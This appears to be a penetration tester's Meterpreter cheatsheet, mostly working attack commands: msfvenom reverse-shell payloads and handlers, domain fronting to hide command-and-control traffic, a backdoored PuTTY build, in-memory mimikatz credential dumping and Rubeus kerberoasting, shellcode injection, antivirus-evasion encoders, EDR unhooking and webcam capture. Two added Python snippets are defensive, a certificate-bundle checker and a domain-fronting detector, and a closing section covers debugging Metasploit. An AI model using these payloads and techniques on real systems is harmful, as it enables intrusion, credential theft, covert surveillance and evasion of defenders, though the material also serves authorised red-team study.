# Meterpreter

* <https://buffered.io/posts/staged-vs-stageless-handlers/>
* <https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/>
* <https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation>
* <https://xakep.ru/2020/07/03/metasploit-guide/>
* <https://diablohorn.com/2013/02/21/we-bypassed-antivirus-how-about-idsips/>
* <https://redops.at/en/blog/meterpreter-vs-modern-edrs-in-2023>

## Cheatsheet

Quick handler launch:

```
msf > handler -H eth0 -P 443 -p windows/x64/meterpreter/reverse_https [-e x64/xor] [-x]
```

Bind RC4 payload & handler through SOCKS proxy:

```
$ msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 RHOST=10.10.13.37 LPORT=443 RC4PASSWORD='Passw0rd!' -f exe -o rev.exe
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp_rc4
msf exploit(multi/handler) > set RHOST 192.168.1.11
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > set RC4PASSWORD Passw0rd!
msf exploit(multi/handler) > set PROXIES socks5:127.0.0.1:1080
msf exploit(multi/handler) > run
```

Generate a custom SSL certificate for encrypting C2 communications:

```
$ openssl req -batch -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout cert.key -out cert.crt
$ cat cert.key cert.crt > cert.pem
$ msfvenom -p ... HandlerSSLCert=./cert.pem StagerVerifySSLCert=true ...
msf exploit(multi/handler) > set HandlerSSLCert /home/snovvcrash/cert.pem
msf exploit(multi/handler) > set StagerVerifySSLCert true
```
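Before handing a bundle to `HandlerSSLCert`/`StagerVerifySSLCert`, check that `cert.pem` really carries one private key and one certificate, and record the certificate's SHA1 fingerprint (the same value `openssl x509 -in cert.crt -noout -fingerprint -sha1` prints) so a handler presenting a different certificate stands out. Added example, not part of the original notes or of Metasploit; the bundle below is constructed placeholder text, not real key material.

```python
import base64
import hashlib
import re

# Constructed stand-in for the output of `cat cert.key cert.crt > cert.pem`.
# The base64 bodies are placeholder bytes, NOT a real key or certificate.
SAMPLE_BUNDLE = "\n".join([
    "-----BEGIN PRIVATE KEY-----",
    base64.b64encode(b"placeholder-private-key-bytes").decode(),
    "-----END PRIVATE KEY-----",
    "-----BEGIN CERTIFICATE-----",
    base64.b64encode(b"placeholder-der-certificate-bytes").decode(),
    "-----END CERTIFICATE-----",
    "",
])

# One PEM block: label, then a base64 body, then the matching END line.
_BLOCK = re.compile(r"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)


def parse_bundle(pem_text):
    """Return [(label, der_bytes), ...] for every PEM block, in file order."""
    blocks = []
    for m in _BLOCK.finditer(pem_text):
        body = re.sub(r"\s+", "", m.group(2))
        blocks.append((m.group(1), base64.b64decode(body, validate=True)))
    return blocks


def check_bundle(pem_text):
    """Require exactly one private key and one certificate in the bundle and
    return the certificate's SHA1 fingerprint as AA:BB:...:ZZ."""
    blocks = parse_bundle(pem_text)
    keys = [label for label, _ in blocks if label.endswith("PRIVATE KEY")]
    certs = [der for label, der in blocks if label == "CERTIFICATE"]
    if len(keys) != 1:
        raise ValueError(f"expected exactly one private key, found {len(keys)}")
    if len(certs) != 1:
        raise ValueError(f"expected exactly one certificate, found {len(certs)}")
    digest = hashlib.sha1(certs[0]).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


if __name__ == "__main__":
    print("SHA1 Fingerprint=" + check_bundle(SAMPLE_BUNDLE))
```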

Automation (about `exploit` flags [here](https://github.com/rapid7/metasploit-framework/blob/4049c41ac1b6f12566b055dc5442192072ea5d78/lib/msf/ui/console/command_dispatcher/exploit.rb#L17-L27)):

{% code title="auto.rc" %}

```
# sudo msfconsole -qr auto.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_winhttps
set LHOST 10.10.13.37
set LPORT 443
set EXITFUNC thread
set StageEncoder x64/zutto_dekiru
set EnableStageEncoding true
set HandlerSSLCert /home/snovvcrash/cert.pem
set StagerVerifySSLCert true
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -jz
```

{% endcode %}

Start SOCKS server (default is SOCKS5):

```
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
```

Handle connections with **domain fronting**:

```
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=legitimate.com LPORT=443 HttpHostHeader=cdn.provider.net -f exe -o https.exe
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST legitimate.com
msf exploit(multi/handler) > set OverrideLHOST legitimate.com
msf exploit(multi/handler) > set OverrideRequestHost true
msf exploit(multi/handler) > set HttpHostHeader cdn.provider.net
msf exploit(multi/handler) > run
```
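From the defender's side the configuration above leaves a simple signature: the TLS SNI (`legitimate.com`, from `LHOST`) no longer matches the HTTP `Host` header (`cdn.provider.net`, from `HttpHostHeader`). The added example below (mine, not from the original notes) flags that mismatch over constructed TLS-inspection log lines while ignoring same-site differences such as `legitimate.com` vs `www.legitimate.com`; the log format and the two-label registrable-domain shortcut are assumptions.

```python
import re
from collections import defaultdict

# Constructed TLS-inspection proxy log (not from any real environment):
# SNI from the ClientHello next to the Host header of the decrypted request.
SAMPLE_LOG = """\
2024-01-01T10:00:01Z src=10.0.0.5 sni=legitimate.com host=legitimate.com
2024-01-01T10:00:02Z src=10.0.0.5 sni=legitimate.com host=cdn.provider.net
2024-01-01T10:00:03Z src=10.0.0.9 sni=mail.example.org host=www.example.org
2024-01-01T10:00:04Z src=10.0.0.5 sni=legitimate.com host=cdn.provider.net
2024-01-01T10:00:05Z src=10.0.0.7 sni=legitimate.com host=www.legitimate.com
"""

LINE = re.compile(r"(?P<ts>\S+) src=(?P<src>\S+) sni=(?P<sni>\S+) host=(?P<host>\S+)")


def registrable(name):
    """Crude eTLD+1 (last two labels). Assumption: good enough for the sample;
    a real deployment would use the public suffix list."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def parse_line(line):
    """Return the fields of one log line, or None for lines that do not match."""
    m = LINE.match(line)
    return m.groupdict() if m else None


def fronting_candidates(log_text):
    """Count SNI/Host mismatches per (src, sni, host), skipping same-site pairs.
    Repeated mismatches from one source to one front/host pair are the
    pattern the reverse_https + HttpHostHeader setup produces."""
    hits = defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if registrable(rec["sni"]) != registrable(rec["host"]):
            hits[(rec["src"], rec["sni"], rec["host"])] += 1
    return dict(hits)


if __name__ == "__main__":
    for (src, sni, host), n in fronting_candidates(SAMPLE_LOG).items():
        print(f"{src}: SNI {sni} but Host {host} ({n} requests)")
```

Legitimate CDN setups also produce SNI/Host mismatches, so treat the counts as a triage queue keyed by source and host pair rather than a direct alert.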

Migrate to a different architecture:

```
msf > use post/windows/manage/archmigrate
msf post(windows/manage/archmigrate) > set SESSION 1
msf post(windows/manage/archmigrate) > run
```

Switch to the next [transport](https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Transport-Control), killing the current session:

```
meterpreter > transport add -t reverse_tcp -l 10.10.13.37 -p 9002
meterpreter > transport list
msf > handler -H eth0 -P 9002 -p windows/x64/meterpreter/reverse_tcp
meterpreter > transport next
```

Forward local port `43389` (on Attacker) to port `3389` on Victim (`192.168.1.11`):

```
meterpreter > portfwd add -l 43389 -p 3389 -r 192.168.1.11
[*] Local TCP relay created: :43389 <-> 192.168.1.11:3389
$ xfreerdp /u:administrator /p:'Passw0rd!' /v:127.0.0.1:43389
```

Routing:

```
meterpreter > run autoroute -s 192.168.10.0/24
meterpreter > run autoroute -p
```

Or from the console:

```
msf5 > route add 192.168.10.0/24 1
msf5 > route
```

Execute binary from memory:

```
meterpreter > execute -cimH -d calc.exe -f /home/snovvcrash/www/mimikatz.exe -a '"sekurlsa::logonPasswords full" "exit"'
```

[Execute](https://github.com/b4rtik/metasploit-execute-assembly) .NET assembly from memory:

```
msf > use post/windows/manage/execute_dotnet_assembly
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/Rubeus.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS "kerberoast /usetgtdeleg /format:hashcat"
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > run
```

Inject shellcode:

```
msf > use post/windows/manage/shellcode_inject
msf post(windows/manage/shellcode_inject) > set SHELLCODE /home/snovvcrash/www/shellcode.bin
msf post(windows/manage/shellcode_inject) > set SESSION 1
msf post(windows/manage/shellcode_inject) > run
```

Backdoor a legitimate executable with delayed Stdapi loading:

```
$ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe
$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run'
meterpreter > use unhook
meterpreter > load stdapi
```

Quick OPSEC-friendly traffic build template:

```bash
sudo certbot certonly --standalone -d $DOMAIN --register-unsafely-without-email --agree-tos --key-type rsa
sudo cat /etc/letsencrypt/live/$DOMAIN/{privkey.pem,cert.pem} > /tmp/cert.pem

msfvenom -p windows/x64/meterpreter_reverse_https AutoLoadStdapi='false' AutoSystemInfo='false' HandlerSSLCert='/tmp/cert.pem' HttpCookie='...' HttpReferer='https://www.microsoft.com/en-us/' HttpServerName='nginx' HttpUnknownRequestResponse='...' HttpUserAgent='Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko' StagerVerifySSLCert='true' LHOST='...' LPORT='443' LURI='...' -f raw -o /tmp/met.bin
```

Capture from the webcam:

```
meterpreter > webcam_list
meterpreter > webcam_snap [-i <CAMERA_ID>]
meterpreter > webcam_stream
```

## Debug

* <https://github.com/deivid-rodriguez/pry-byebug>

{% embed url="https://youtu.be/QzP5nUEhZeg?t=2190" %}

```
$ gem install pry-byebug
$ vi ~/.pryrc
```

{% code title=".pryrc" %}

```ruby
if defined?(PryByebug)
  Pry.commands.alias_command 'c', 'continue'
  Pry.commands.alias_command 's', 'step'
  Pry.commands.alias_command 'n', 'next'
  Pry.commands.alias_command 'f', 'finish'
end

# Hit Enter to repeat last command
Pry::Commands.command(/^$/, "repeat last command") do
  pry_instance.run_command Pry.history.to_a.last # `_pry_` on Pry < 0.13
end
```

{% endcode %}

```
$ cp -r /usr/share/metasploit-framework/ /opt
$ vi /opt/metasploit-framework/msfconsole
...add "require 'pry-byebug'"...
$ mkdir -p ~/.msf4/modules/exploits/linux/http/
$ cp /usr/share/metasploit-framework/modules/exploits/linux/http/packageup.rb ~/.msf4/modules/exploits/linux/http/p.rb
$ vi ~/.msf4/modules/exploits/linux/http/p.rb
...add "binding.pry"...
```

